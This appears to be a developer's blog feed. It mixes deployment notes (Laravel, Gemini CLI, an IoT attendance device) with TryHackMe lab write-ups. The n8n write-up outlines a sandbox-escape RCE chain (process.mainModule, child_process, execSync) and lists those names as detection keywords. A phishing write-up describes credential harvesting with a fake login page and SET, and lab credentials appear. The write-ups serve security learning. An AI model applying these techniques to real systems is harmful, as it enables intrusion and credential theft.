Application filtering for non-browser HTTP clients
Security rule limiting outbound traffic by device type

In enterprise networks, security layers are often invisible to end users.

8. How to Communicate With IT (Best Practice)

Instead of saying:

“Port 8001 is blocked.”

A better technical request is:

The attendance device cannot establish outbound TCP session to fvivo.online:8001 when connected to office WiFi, but works via mobile hotspot. PC connectivity test to the same endpoint succeeds. Please check if there is any MAC-based policy, VLAN isolation, or application filtering affecting this device.

This approach avoids blame and invites structured investigation.

9. Lessons Learned

🔹 1. IoT devices are treated differently

Enterprise WiFi does not treat all clients equally.

🔹 2. Port open ≠ Traffic allowed

Firewall inspection can allow a port while still blocking specific traffic patterns.

🔹 3. Always compare environments

If hotspot works and office WiFi does not: The network is the variable—not the device.

🔹 4. Push SDK over HTTPS is safer

Using HTTPS (443) significantly reduces filtering issues in enterprise environments.

10. Recommended Best Practices

Use HTTPS (443) whenever possible
Ask IT to whitelist device MAC address
Document server IP and domain
Keep network architecture diagrammed
Avoid custom ports if corporate firewall policies are unknown

Final Opinion

Deploying biometric attendance devices is no longer just a hardware task—it is a networking task.

Modern enterprise networks prioritize security, often at the expense of IoT compatibility.

Understanding network layers (L3 vs L7 filtering) is critical for successful deployment.

If a device works on hotspot but fails on corporate WiFi, the network policy is almost always the hidden variable.

If this case study helped you, feel free to share it or follow for more real-world deployment insights.

Deploying Laravel E-commerce: Lessons from the Field

Wed, 11 Feb 2026 00:00:00 GMT

This document outlines the development process for a single-vendor e-commerce website using a Laravel backend, MySQL database, and Vue.js for the frontend. Initially, three potential tech stacks were considered: Medusa.js, Saleor, and Laravel + Vue.js 3.

The initial local development phase involved:

Installing Laragon and setting up the project in C:\laragon\www\sonusweb.
Creating a MySQL database named sonusweb.

The .env configuration during local setup:

APP_NAME="sonusweb"
APP_URL="http://localhost"
APP_ENV=local
APP_KEY=
APP_DEBUG=true
APP_TIMEZONE="Asia/Jakarta"

ASSET_URL="http://localhost"

DEMO_MODE="Off"

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=sonusweb
DB_USERNAME=root
DB_PASSWORD=

Challenges encountered during local setup included:

Issues with the PHP zip extension not being enabled.
Deciding not to enable Redis locally, leading to .env modifications: CACHE_DRIVER=file SESSION_DRIVER=file QUEUE_CONNECTION=sync
An error related to a missing 'settings' table, which required adjusting helper configurations to conditionally access the database only if the table exists.
Further errors prompted disabling Redis service providers in app.php (Illuminate\Redis\RedisServiceProvider::class) and commenting out Redis cache configurations in cache.php.

Due to persistent local development issues, the strategy shifted to duplicating an existing Laravel source code from a VPS:

Duplicating the MySQL database to a new one using an Aapanel VPS.
Configuring a new DNS for the new domain with PHP version 8.3.
Copying project files to a new directory.
Updating the .env file with production settings for the new deployment:

APP_NAME="NEW_APP"
APP_URL="NEW_URL"
APP_ENV=production
APP_KEY=
APP_DEBUG=false
APP_TIMEZONE="Asia/Jakarta"

ASSET_URL="NEW_URL"

DEMO_MODE="Off"

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST="localhost"
DB_PORT="3306"
DB_DATABASE="NEW_DB_NAME"
DB_USERNAME="NEW_DB_USER"
DB_PASSWORD=

Finally, running php artisan config:clear and php artisan cache:clear successfully launched the website.

What I’d Do Differently Next Time

Looking back, I wouldn’t spend too much time fixing local environment issues.

For Laravel projects with real deployment targets, it’s often faster to:

validate directly on a clean VPS,
align PHP extensions with production from day one,
and avoid local-only optimizations that won’t ship.

Local dev is still important, but only when it mirrors production closely.

Why I Finally Chose Laravel Over Medusa & Saleor

Medusa: great architecture, but ecosystem still evolving
Saleor: solid GraphQL core, heavier infra footprint
Laravel: fastest path to production with full control

For this project, speed-to-production mattered more than architectural purity.

Need help with Laravel e-commerce or VPS deployment?

DM me on LinkedIn or email hello@farros.co 🚀

Installing Gemini CLI on VPS the Right Way

Wed, 11 Feb 2026 00:00:00 GMT

Installing Gemini CLI on a VPS is straightforward — until it isn’t.
Most people stop at npm install -g, but on many VPS setups (especially with aaPanel or custom Node builds), the binary won’t be available globally.

This guide shows how to install it properly so you can simply type:

gemini

And it just works.

1. Install Node.js (If Not Installed)

Check your Node version:

node -v
npm -v

If you’re using aaPanel, Node is usually located under:

/www/server/nodejs/

2. Install Gemini CLI Globally

Run:

npm install -g @google/gemini-cli

After installation, verify where global packages are installed:

npm root -g
npm config get prefix

Example output:

/www/server/nodejs/v20.18.1

That means the binary is located at:

/www/server/nodejs/v20.18.1/bin

3. Fix the PATH (Critical Step)

On many VPS environments, that directory is NOT included in $PATH.

Without fixing this, you'll get:

gemini: command not found

Temporary Fix

export PATH=$PATH:/www/server/nodejs/v20.18.1/bin

Permanent Fix

Edit your shell profile:

nano ~/.bashrc

Add:

export PATH=$PATH:/www/server/nodejs/v20.18.1/bin

Reload:

source ~/.bashrc

Now test:

gemini

If everything is correct, the CLI should launch immediately.

4. Authenticate with Gemini

Run:

gemini /auth

Or set your API key manually:

export GEMINI_API_KEY=your_api_key_here

To persist it:

nano ~/.bashrc

Add:

export GEMINI_API_KEY=your_api_key_here

Reload:

source ~/.bashrc

Why PATH Matters (Opinionated Take)

Most “installation guides” stop after npm install -g.
But on real production VPS environments, especially with custom Node paths, that’s incomplete.

If you cannot run a tool globally with a single command, the setup isn’t finished.

Clean environments matter.
Developer ergonomics matter.
Typing gemini and having it instantly available is how it should be.

Final Result

Once configured correctly, you should be able to:

gemini

If you’re setting up production environments and want a clean, reliable server stack, feel free to connect.

Relearning SQL Through Real-World E-Commerce Projects

Mon, 09 Feb 2026 00:00:00 GMT

I want to share my experience of relearning SQL, which I am currently diving back into.

This started because my current project is closely related to SQL, specifically an e-commerce platform. The backend stack uses MySQL with Laravel, and in some parts PostgreSQL as well. Because of that, I became interested in revisiting SQL fundamentals and sharpening my skills again.

To rebuild a solid foundation, I decided to study through DataCamp and completed the following courses:

Introduction to SQL
https://www.datacamp.com/completed/statement-of-accomplishment/course/2a5b95c3d50b83f77f051cbd99e0c10400d65458
Introduction to SQL Server
https://www.datacamp.com/completed/statement-of-accomplishment/course/a115bdd43fa73424e6a572e71cc3c1261ab649b0
Intermediate SQL Server
https://www.datacamp.com/completed/statement-of-accomplishment/course/ca7b3bed05e7b9e4404553adbb830d75b3c87317

Previously, I worked as a data engineer for several years before taking a step back to explore different technical directions.

At the moment, I am learning SQL through more realistic and business-driven queries that reflect real workflows. Since my focus is e-commerce, I am exploring how to design and query data related to products, transactions, users, admins, categories, inventory stock, pricing, shipping processes, invoices, payments, and many other related tables.

The goal is not just to write SQL queries, but to truly understand how data flows in a real production system.

Below are several SQL and database technologies that I have worked with:

MySQL

Well-suited for Laravel/PHP stacks, startups (mid-scale), and CRUD-heavy applications.

MySQL Pros

Simple and stable
Widely supported by hosting providers
Affordable and easy to maintain

MySQL Cons

Complex queries can become expensive
Advanced SQL features matured relatively late

MySQL E-commerce use cases

Products
Orders
Users
Payments

PostgreSQL

Well-suited for B2B e-commerce, systems with complex queries, and hybrid OLTP + analytics workloads.

PostgreSQL Pros

Rich and strict SQL implementation
Powerful features such as window functions, CTEs, and JSONB
Excellent for reporting and analytics with strong data integrity

PostgreSQL Cons

More complex setup and tuning
Hosting is relatively more expensive
Requires strong schema discipline

PostgreSQL E-commerce use cases

Pricing rules
Contract-based pricing
Inventory movements
Invoices and financial reports
Shipment analytics

SQL Server

Well-suited for enterprise B2B systems, finance, ERP, internal platforms, and BI/data engineering teams.

SQL Server Pros

Strong tooling (SSMS, reporting services)
Stable and reliable performance
Excellent support for ETL and BI workflows (SSIS)
Strong support for stored procedures and views

SQL Server Cons

Expensive licensing
Rarely used in startup environments
Less flexible compared to PostgreSQL

SQL Server E-commerce use cases

Data warehouses
Financial reporting
Sales dashboards
Audit and compliance systems

NoSQL

Best used as a complementary technology rather than a replacement for SQL databases.

NoSQL E-commerce use cases

Shopping carts
User sessions
Product view caching
Activity logs
Search indexing

If you are building or scaling an e-commerce system—especially B2B—and need help with database design, SQL optimization, or data modeling based on real business workflows, feel free to reach out.

You can contact me via email at hello@farros.co.

Exploring Medusa JS for Scalable B2B Commerce

Sat, 07 Feb 2026 23:03:00 GMT

Why I’m Looking Beyond Traditional Platforms

When building a B2B e-commerce platform, the challenges are usually not about themes or plugins, but about architecture:

Custom pricing logic2
Flexible product structures
Integration with internal systems
Scalability without vendor lock-in

Popular platforms like Magento are mature and powerful, but also come with complexity and operational overhead. For newer projects where flexibility and long-term maintainability matter, I started exploring Medusa JS.

What Is Medusa JS?

Medusa JS is an open-source, headless commerce backend. Conceptually, it sits in a similar space to Shopify—but instead of a hosted SaaS, Medusa is self-hosted and API-first.

In practice, this means:

You own the backend
You control the data
You design the frontend freely

This makes it particularly interesting for custom B2B workflows.

Architecture Overview

At a high level, the setup looks like this:

Backend: Medusa JS (Node.js)
Database: PostgreSQL
Frontend: Next.js (or any framework consuming APIs)
Optional: Redis for caching and background jobs

The backend exposes clean APIs, while business logic is organized into services, entities, subscribers, and plugins. From an architectural standpoint, this separation is a big plus for long-term maintenance.

Early Observations (Pros & Cons)

What Looks Promising

JavaScript-first stack: Easier onboarding for modern web teams
API-driven design: Clean separation between frontend and backend
Modular extensibility: Plugins and custom services feel natural
PostgreSQL as a core dependency: Solid choice for transactional systems

Things to Be Careful About

The ecosystem is still young compared to Magento
Documentation is good, but real-world examples are limited
Requires more architectural decisions upfront
Not ideal for teams looking for a “click-and-deploy” solution

Current Status: Testing & Validation

Right now, I’m still in the early-stage testing phase, running Medusa on a VPS and validating:

Deployment stability
Data modeling for B2B use cases
Integration patterns with a custom frontend
Operational complexity in real environments

This is not about replacing mature platforms blindly, but about understanding where Medusa fits best.

Final Thoughts

Medusa JS is not a silver bullet, but for teams that:

need full control,
value open-source,
and are comfortable designing their own architecture,

…it’s a very compelling option.

I’ll be sharing more findings once the testing phase progresses.

Resources

Docs & Quick Start: https://docs.medusajs.com
GitHub: https://github.com/medusajs/medusa

n8n: CVE-2025-68613 | TryHackMe Write-Up

Thu, 25 Dec 2025 00:00:00 GMT

Here i want to share about my write-up for the room n8n: CVE-2025-68613, Learn how adversaries can exploit the CVE-2025-68613 vulnerability in n8n. Hope it is useful for learning about cybersecurity.

Task 1: Introduction

CVE-2025-68613 is a critical vulnerability (CVSS 9.9) in the n8n workflow automation platform, published in December 2025. This vulnerability is a Remote Code Execution (RCE) flaw found in the workflow expression evaluation system, affecting versions 0.211.0 through 1.120.3. It allows authenticated attackers to execute system-level commands by injecting malicious JavaScript code. Users are strongly advised to update to patched versions (1.120.4, 1.121.1, or 1.122.0) to secure their instances.

Let’s dive into the technical details.

No answer needed

Task 2: Technical Background

n8n is built on Node.js and uses an Expression Evaluation System to process dynamic user input wrapped in {{ }}. The vulnerability exists because this system lacks proper sandboxing. An attacker can escape the intended context by using this to access the global Node.js object. The exploit chain typically involves accessing this.process.mainModule, loading the child_process module via require(), and finally executing system commands (e.g., execSync('id')). This demonstrates a fundamental breach of security boundaries where user expressions gain access to the underlying runtime environment.

In this exploit, what is the name of the module that allowed us to execute system commands?

child_process

Task 3: Exploitation

To exploit this vulnerability, an attacker logs into the n8n dashboard (e.g., using tryhackme@thm.local) and creates a new workflow. The method involves adding a "Manual Trigger" connected to an "Edit Fields (Set)" node. Inside the "Edit Fields" node, the attacker adds a new field and pastes the malicious JavaScript payload (containing the sandbox escape code) into the value field. Upon clicking "Execute step," the code runs on the server, and the output of the system command (such as the id command) is displayed in the interface.

Landing page after logging into the n8n dashboard.

Creating a new workflow by selecting Start from scratch.

Choosing Manual Trigger as the first workflow step.

Adding the Edit Fields (Set) node to the workflow.

Injecting the malicious JavaScript expression into a new field.

Executing the workflow step to trigger server-side command execution.

Successful execution of the id command, confirming RCE.

Reading the flag file (flag.txt) directly from the server.

What is the flag?

THM()

Task 4: Detection

Since n8n's native logging is limited, detection is best achieved by using a proxy (like Nginx) to log web request bodies. Security teams can use Sigma rules to scan these logs for specific patterns in POST requests to /rest/workflows, looking for keywords like this.process.mainModule, execSync, and child_process. Additionally, it is critical to monitor the operating system for suspicious process creation events—such as reverse shells or reconnaissance commands—to identify post-exploitation activity.

Depending on your environment, ensure that your security solutions are detecting threats targeting your web applications and infrastructure.

No answer needed

Task 5: Conclusion

This vulnerability highlights the severe risks associated with insecure expression evaluation and flawed trust boundaries between user input and the application runtime. Understanding this exploit helps in developing better detection strategies that focus on context escalation patterns. The most effective mitigation is to ensure the n8n server is upgraded to a secure, patched version immediately.

If you enjoyed this room, consider checking other rooms in the Recent Threats module.

No answer needed

Splunk | Advent of Cyber 2025 Day 3 Write-Up

Sun, 21 Dec 2025 21:31:00 GMT

Here i want to share about my write-up for the room Splunk | Advent of Cyber 2025 (Day 3).

Here is the extracted material formatted according to your requirements.

Task 1: Introduction

The story begins in Wareville, where The Best Festival Company (TBFC) is preparing for Christmas. However, a ransom message from King Malhare appears, threatening to turn the holiday into "EAST-mas." With the network under attack and McSkidy missing, the SOC team must utilize Splunk to investigate the ransomware infiltration and stop the plan.

The learning objectives for this task include ingesting custom log data, creating field extractions, using Search Processing Language (SPL), and conducting a forensic investigation. The environment contains a pre-configured Splunk instance with the necessary logs.

I successfully have access to the Splunk instance!

No answer needed

Task 2: Log Analysis with Splunk

In this task, we investigate the incident using two pre-ingested datasets: web_traffic (web server logs) and firewall_logs (traffic allowed/blocked). The investigation process follows these steps:

Initial Triage: querying index=main reveals a massive spike in traffic. Using timechart, we can pinpoint the exact day of the attack.
Anomaly Detection: Analyzing the user_agent field shows suspicious tools (unlike standard Mozilla/Chrome browsers). Filtering out benign traffic reveals a single attacker IP address.
Tracing the Attack Chain:

Reconnaissance: The attacker used tools like curl and wget to probe for configuration files (e.g., /.env, /.git).
Enumeration: Path traversal attempts (../../) were detected to access system files.
Exploitation: SQL Injection attacks were identified via user agents like sqlmap and Havij.
Exfiltration: Large files (backup.zip, logs.tar.gz) were downloaded.
Ransomware Staging: A web shell (shell.php) was used to execute a ransomware binary (bunnylock.bin), confirming Remote Code Execution (RCE).

C2 Correlation: By pivoting to firewall_logs, we confirmed the compromised server (10.10.1.5) established an outbound connection to the attacker's IP, transferring a significant volume of data.

What is the attacker IP found attacking and compromising the web server?

index=main sourcetype=web_traffic

198.51.100.55

Which day was the peak traffic in the logs?

index=main sourcetype=web_traffic

2025-10-12

What is the count of Havij user_agent events found in the logs?

index=main sourcetype=web_traffic user_agent=Havij

993

How many path traversal attempts to access sensitive files on the server were observed?

index=main sourcetype=web_traffic path="../../"

658

Examine the firewall logs. How many bytes were transferred to the C2 server IP from the compromised web server?

index=main sourcetype=firewall_logs action=ALLOWED| stats sum(bytes_transferred)

126167

If you enjoyed today's room, check out the Incident Handling With Splunk room to learn more about analyzing logs with Splunk.

No answer needed

Phising | Advent of Cyber 2025 Day 2 Write-Up

Sun, 21 Dec 2025 06:35:00 GMT

Here i want to share about my write-up for the room Phising | Advent of Cyber 2025 (Day 2).

Task 1: Introduction

This section introduces the scenario: The Best Festival Company (TBFC) has faced security threats, prompting a Red Team assessment. You are working with "Recon McRed" and others to execute a phishing campaign to test employee diligence. The objective is to learn about social engineering, types of phishing, creating fake login pages, and using the Social-Engineer Toolkit. This task also involves initializing the necessary AttackBox and Target VM environments.

I have successfully started the AttackBox and the target machine!

No answer needed

Task 2: Phishing Exercise for TBFC

This task dives into the mechanics of social engineering and phishing. It defines Social Engineering as manipulating humans into making security mistakes by exploiting psychology (urgency, curiosity, authority), and Phishing as a subset of this using communication mediums like email.

The task outlines the S.T.O.P. method for defense (Suspicious, Telling, Offering, Pushing) and guides the user through a Red Team attack simulation:

Building the Trap: A fake TBFC login page script (server.py) is provided. When run, it hosts a web server on port 8000 to capture credentials.
Delivery: Using the Social-Engineer Toolkit (SET) (setoolkit), the attacker configures a "Mass Mailer Attack".
Configuration: The email is spoofed to look like it comes from "Flying Deer" (updates@flyingdeer.thm) and is sent to factory@wareville.thm via the internal SMTP server. The body contains the link to the malicious server (http://<IP>:8000).
Exploitation: Once the target clicks the link and logs in, the credentials are captured in the attacker's terminal.

What is the password used to access the TBFC portal?

unranked-wisdom-anthem

Browse to http://10.49.171.168 from within the AttackBox and try to access the mailbox of the factory user to see if the previously harvested admin password has been reused on the email portal. What is the total number of toys expected for delivery?

1984000

If you enjoyed today's room, feel free to check out the Phishing Prevention room.

No answer needed

Linux CLI | Advent of Cyber 2025 Day 1 Write-Up

Sat, 20 Dec 2025 15:40:00 GMT

Here i want to share about my write-up for the room Linux CLI | Advent of Cyber 2025 (Day 1).

Task 1: Introduction

The narrative begins with the kidnapping of McSkidy, leaving Wareville's defenses vulnerable to King Malhare. The investigation centers on tbfc-web01, a Linux server responsible for processing Christmas wishlists. The goal is to use the Linux command-line interface (CLI) to find clues about the attack. Users are instructed to start the attached virtual machine and can connect via the browser-based split view or SSH using the provided credentials (mcskidy / AoC2025!).

I have successfully started my virtual machine!

No answer needed

Task 2: Linux CLI

This task provides a crash course in using the Linux CLI for investigation.

Basic Commands & Navigation:

echo "text": Prints text to the terminal.
ls: Lists directory contents.
cat filename: Displays the contents of a file.
cd Directory: Changes the current directory.
Hidden Files: Files starting with a dot (e.g., .guide.txt) are hidden. They can be viewed using ls -la.

Investigation Steps:

Grepping Logs: The guide instructs users to look into /var/log/ for security events. The grep command is used to filter large log files, specifically looking for "Failed password" in auth.log to identify unauthorized login attempts.
Finding Files: The find command (e.g., find /home/socmas -name *egg*) is used to locate specific files, revealing a malicious script named eggstrike.sh.
Analyzing Scripts: The malicious script utilizes special shell features:

Pipe (|): Sends the output of one command to another (e.g., sort | uniq).
Redirect (>): Overwrites a file with output.
Logic (&&): Runs the next command only if the previous one succeeds.

System Administration:

Root User: The superuser with full permissions. Users can switch to root using sudo su and verify their identity with whoami.
Bash History: A history of executed commands is stored in .bash_history. Checking the root user's history reveals the attacker's activities, including the flag.

Which CLI command would you use to list a directory?

ls

Complete on machine

THM{}

Which command helped you filter the logs for failed logins?

grep

Complete on machine

THM{}

Which command would you run to switch to the root user?

sudo su

Finally, what flag did Sir Carrotbane leave in the root bash history?

THM{}

For those who consider themselves intermediate and want another challenge, check McSkidy's hidden note in /home/mcskidy/Documents/ to get access to the key for Side Quest 1! Accessible through our Side Quest Hub!

No answer needed

Enjoyed investigating in a Linux environment? Check out our Linux Logs Investigations room for more like this!

No answer needed

Advent of Cyber Prep Track | TryHackMe Write-Up

Sat, 20 Dec 2025 00:00:00 GMT

Here i want to share about my write-up for the room Advent of Cyber Prep Track. Get ready for the Advent of Cyber 2025 with the "Advent of Cyber Prep Track", a series of warm-up tasks aimed to get beginners ready for this year's event.

Task 1: Welcome to Advent of Cyber 2025

This task introduces the Advent of Cyber 2025 event. The story is set in Wareville, where the "SOC-mas" tradition is threatened by King Malhare. The event features daily beginner-friendly security challenges. Participants can win from a $150,000 prize pool (including MacBooks, iPhones, and Flipper Zeros) by completing rooms by December 31, 2025. Strict rules prohibit cheating, bot usage, and attacking other users or infrastructure. A certificate is awarded for completing all rooms.

Got it!

No answer needed

Task 2: How to use TryHackMe

This section explains the technical interface of TryHackMe. It details how to use the "AttackBox" (a web-based Ubuntu VM) and how to deploy standard Virtual Machines (VMs) for tasks. It covers the split-screen view feature, direct links for specific tools, and alternative connection methods using OpenVPN or direct remote connections (RDP/SSH/VNC) when credentials are provided.

Got it!

No answer needed

Task 3: Join our community

This task encourages participants to join the TryHackMe social channels for updates and support. It highlights the Discord server (with over 326,000 members) as the main hub for connecting with other hackers and getting help. Links are provided for LinkedIn, X (Twitter), Instagram, Facebook, Reddit, and TikTok. It also mentions available Advent of Cyber swag.

Got it!

No answer needed

Task 4: Introduction

The narrative begins with snow falling in Wareville at The Best Festival Company (TBFC). Systems are glitching due to suspected interference by King Malhare. Before the main event starts, users are tasked with 10 short "warm-up" missions to practice essential cybersecurity skills. The interface instruction explains how to use the "View Site" button to open challenges in split-screen.

Warm me up!

No answer needed

Task 5: Challenge 1 — Password Pandemonium

McSkidy's workstation has flagged weak passwords. This challenge focuses on the importance of strong passwords as a defense mechanism. The objective is to create a secure password that meets specific criteria: at least 12 characters, including uppercase, lowercase, numbers, and symbols, and ensuring it does not appear in a breach database.

What's the flag?

THM(REDACTED)

Task 6: Challenge 2 — The Suspicious Chocolate.exe

A mysterious USB labeled "SOCMAS Party Playlist" contains a suspicious file named chocolate.exe. This task simulates using a malware analysis tool (like VirusTotal). The user must scan the file to review its report and determine if it is safe or malicious based on the scan results.

What's the flag?

THM(REDACTED)

Task 7: Challenge 3 — Welcome to the AttackBox

This task introduces the AttackBox environment and the command line interface (CLI). It emphasizes that defenders must be comfortable with the CLI. The objective is to use basic Linux commands: ls to list files, cd to navigate directories, and cat to read a text file named welcome.txt to find the hidden message.

What's the flag?

THM(REDACTED)

Task 8: Challenge 4 — The CMD Conundrum

McSkidy's workstation shows signs of tampering with logs wiped and strange folders created. The task focuses on using the Windows Command Prompt to investigate. The user is required to use the dir command to list files and specifically dir /a to reveal hidden files, then use type to read the content of a hidden flag file.

What's the flag?

THM(REDACTED)

Task 9: Challenge 5 — Linux Lore

Delivery drones are glitching, and an investigation points to a login from a Linux server. This challenge highlights the importance of navigating Linux filesystems. The objective is to find a hidden message in McSkidy’s home directory by entering the folder and using ls -la to reveal hidden "dotfiles" (like .secret_message).

What's the flag?

THM(REDACTED)

Task 10: Challenge 6 — The Leak in the List

There are rumors of a data leak at TBFC. This task simulates using a breach checking tool (similar to Have I Been Pwned). The objective is to check McSkidy’s email address (mcskidy@tbfc.com) against a database to see if the account has been compromised in any known data breaches.

What's the flag?

THM(REDACTED)

Task 11: Challenge 7 — WiFi Woes in Wareville

Drones are behaving erratically because someone logged into the company router using default credentials. This task emphasizes the security risk of leaving default passwords active. The user must log into the router using admin/admin, navigate to security settings, and update the password to a secure one.

What's the flag?

THM(REDACTED)

Task 12: Challenge 8 — The App Trap

McSkidy's social account is posting strange messages due to a suspicious third-party application. The task teaches how to manage and review app permissions to prevent data leaks. The objective is to identify a connected app with excessive permissions (such as access to a password vault) and revoke its access.

What's the flag?

THM(REDACTED)

Task 13: Challenge 9 — The Chatbot Confession

The AI assistant, FestiveBot, has been leaking internal secrets. This task focuses on the risks of AI oversharing sensitive data. The user must review the chatbot's conversation history to identify specific lines where the bot revealed private information, such as internal URLs or passwords.

What's the flag?

THM(REDACTED)

Task 14: Challenge 10 — The Bunny’s Browser Trail

Web servers are experiencing heavy traffic with a suspicious log entry. This task introduces log analysis and "User Agent" strings. The user needs to review HTTP logs to distinguish between standard browser traffic (Chrome, Firefox, Edge) and identifying a suspicious entry coming from "BunnyOS".

What's the flag?

THM(REDACTED)

Task 15: The Finish Line

This final task wraps up the Prep Track. It confirms that the user has completed the warm-up challenges, covering topics from Linux CLI to Prompt Injection. The user is now familiar with the key tools needed for the main event and is ready to participate in Advent of Cyber 2025 to help save SOC-mas.

Bring on Advent of Cyber 2025!

No answer needed

Threat Modelling | TryHackMe Write-Up

Wed, 17 Dec 2025 00:00:00 GMT

Here i want to share about my write-up for the room Threat Modelling (Premium Room), building cyber resiliency and emulation capabilities through threat modelling.. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

Threat modelling is a proactive approach to identifying vulnerabilities, prioritising threats, and implementing security measures to safeguard critical assets. In the modern cyber security landscape, relying solely on reactive measures is insufficient against sophisticated threat actors.

Learning Objectives:

Understand the significance of threat modelling for organisational resiliency.
Learn the fundamentals of modelling significant threats.
Explore frameworks such as MITRE ATT&CK, DREAD, STRIDE, and PASTA.

Prerequisites: It is recommended to have knowledge of Threat Emulation and Principles of Security before starting this module.

Let's start modelling threats!

No answer needed

Task 2: Threat Modelling Overview

What is Threat Modelling? It is a systematic approach to identifying, prioritising, and addressing potential security threats. By simulating attack scenarios and assessing vulnerabilities, organisations can reduce risk exposure and allocate resources effectively.

Key Definitions (The "House" Analogy):

Threat: Potential occurrence or actor (e.g., a burglar).
Vulnerability: A weakness or flaw (e.g., broken locks).
Risk: The likelihood of compromise (e.g., living in a high-crime area).

High-Level Process:

Define Scope: Identify systems/networks.
Asset Identification: Diagram architecture and identify critical data.
Identify Threats: pinpoint potential attacks (cyber, physical, social engineering).
Analyse Vulnerabilities & Prioritise Risks: Assess impact and likelihood.
Countermeasures: Design and implement controls.
Monitor & Evaluate: Continuously test effectiveness.

Attack Trees:

An attack tree is a graphical representation used to analyse threats. The root node represents the attacker's goal (e.g., "Gain unauthorised access"), while branches represent the techniques and paths used to achieve that goal.

What is a weakness or flaw in a system, application, or process that can be exploited by a threat?

vulnerability

Based on the provided high-level methodology, what is the process of developing diagrams to visualise the organisation's architecture and dependencies?

Asset Identification

What diagram describes and analyses potential threats against a system or application?

attack tree

Task 3: Modelling with MITRE ATT&CK

The Framework: The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is a global knowledge base of adversary behaviour. It is organised into a matrix of Tactics (high-level objectives) and Techniques (methods used).

Components of a Technique Page:

Description: Details of the technique.
Procedure Examples: Real-world usage by threat actors.
Mitigations: Recommended security measures.
Detections: Strategies/indicators to identify the technique.

Integration into Threat Modelling: MITRE ATT&CK is mapped after the "Identify Threats" phase. By mapping threats to specific ATT&CK techniques, security teams can derive specific mitigations and detection strategies. It aids in developing threat scenarios, identifying attack paths, and prioritising vulnerability remediation based on real-world threat group data.

What is the technique ID of "Exploit Public-Facing Application"?

T1190

Under what tactic does this technique belong?

Initial Access

Task 4: Mapping with ATT&CK Navigator

ATT&CK Navigator: This is an open-source, web-based tool designed to visualise and navigate the MITRE ATT&CK matrix. It allows users to create custom layers to map techniques relevant to their specific environment.

Key Features:

Selection Controls: Search and select techniques by keywords, threat groups (e.g., APT41), or software.
Layer Controls: Filter by platform (Windows, Linux, etc.), sort, and export data (JSON, Excel, SVG).
Technique Controls: Annotate specific techniques with scores, background colours, comments, and metadata to highlight risks.

Scenario: In a financial services context using GCP and web apps, an analyst can map threat groups like APT28 or FIN7 to the matrix. This helps prioritise critical vulnerabilities such as Exploit Public-Facing Application (T1190) or Data from Cloud Storage (T1530).

How many MITRE ATT&CK techniques are attributed to APT33?

31

Upon applying the IaaS platform filter, how many techniques are under the Discovery tactic?

13

Task 5: DREAD Framework

Overview: Developed by Microsoft, DREAD is a risk assessment model used for qualitative risk analysis. It prioritises threats based on the average score (1-10) of five categories.

The DREAD Categories:

Damage: How bad would the attack be? (e.g., data loss, downtime).
Reproducibility: How easy is it to reproduce the attack?
Exploitability: How much work/skill is required to launch the attack?
Affected Users: How many people are impacted?
Discoverability: How easy is it to find the vulnerability?

Guidelines: To reduce subjectivity, organisations should establish standardised scoring definitions, encourage team collaboration for scoring justification, and use DREAD alongside other methodologies.

What DREAD component assesses the potential harm from successfully exploiting a vulnerability?

Damage

What DREAD component evaluates how others can easily find and identify the vulnerability?

Discoverability

Which DREAD component considers the number of impacted users when a vulnerability is exploited?

Affected Users

Task 6: STRIDE Framework

Overview: STRIDE is a threat modelling methodology used primarily in software development and system design. It identifies threats by categorising them into six types, each violating a specific aspect of the CIA Triad (Confidentiality, Integrity, Availability) or related security policies.

The Categories:

Spoofing: Impersonating a user/system (Violates: Authentication).
Tampering: Modifying data/code (Violates: Integrity).
Repudiation: Denying actions due to lack of logging (Violates: Non-repudiation).
Information Disclosure: Unauthorised access to data (Violates: Confidentiality).
Denial of Service: Disrupting availability (Violates: Availability).
Elevation of Privilege: Gaining unauthorised access levels (Violates: Authorisation).

Implementation: The process involves decomposing the system, applying STRIDE categories to each component, assessing the risk, and developing specific countermeasures (e.g., using DMARC to prevent email spoofing).

What foundational information security concept does the STRIDE framework build upon?

CIA Triad

What policy does Information Disclosure violate?

Confidentiality

Which STRIDE component involves unauthorised modification or manipulation of data?

Tampering

Which STRIDE component refers to the disruption of the system's availability?

Denial of Service

Insecure web application search functionality leading to SQL injection.

Tampering
Information Disclosure

Insecure AWS Infrastructure (EC2, S3, RDS) without load balancers.

Information Disclosure
Denial of Service

Mail server with no logging enabled.

Spoofing

Unpatched employee workstations.

Tampering
Elevation of Privilages

Provide the flag for the simulated threat modelling exercise.

THM{_}

Task 7: PASTA Framework

Overview: PASTA (Process for Attack Simulation and Threat Analysis) is a risk-centric, seven-step framework. It aligns threat modelling with business objectives and technical requirements.

The Seven-Step Methodology:

Define Objectives: Establish scope and compliance requirements.
Define Technical Scope: Inventory assets and understand architecture.
Decompose Application: Map data flows, trust boundaries, and components.
Analyse Threats: Identify threat sources (internal/external).
Vulnerabilities Analysis: Scan for weaknesses (static analysis, pentesting).
Analyse Attacks: Simulate attack scenarios to verify risks.
Risk and Impact Analysis: Develop countermeasures based on risk tolerance.

Benefits: PASTA is highly adaptable, fosters collaboration between developers/architects/business stakeholders, and ensures security efforts directly support business goals.

In which step of the framework do you break down the system into its components?

Decompose the Application

During which step of the PASTA framework do you simulate potential attack scenarios?

Analyse the Attacks

In which step of the PASTA framework do you create an inventory of assets?

Define the Technical Scope

Process Flow Diagram

Strategic Planning
System Architecture
Software Development
Information Security
Strategic Planning

Quiz Questions and Answers

What should be the top priority for the online banking platform, as mentioned by the Business Analyst?

Protecting customers’ personal and financial data, securing transactions, and ensuring service availability.

According to the System Architect, what are the primary technical assets of the online banking system?

Amazon EC2, RDS, and S3 services

What components of the application did the Lead Developer highlight during the 'Decompose the Application' phase?

User registration, account management, fund transfers, bill payments, and account statements

According to the Security Engineer, which type of threat is NOT considered for the online banking platform?

Social engineering attacks

Which vulnerability was mentioned by the Security Engineer as a potential issue for the online banking platform?

Cloud Infrastructure Misconfigurations

According to the Security Engineer, which mitigation strategy does match the identified threats?

Account lockouts

In the "Risk and Impact Analysis" phase, what potential consequence of a successful attack was mentioned by the Business Analyst?

Financial loss and significant reputational damage

Provide the flag for the simulated threat modelling exercise.

THM{_}

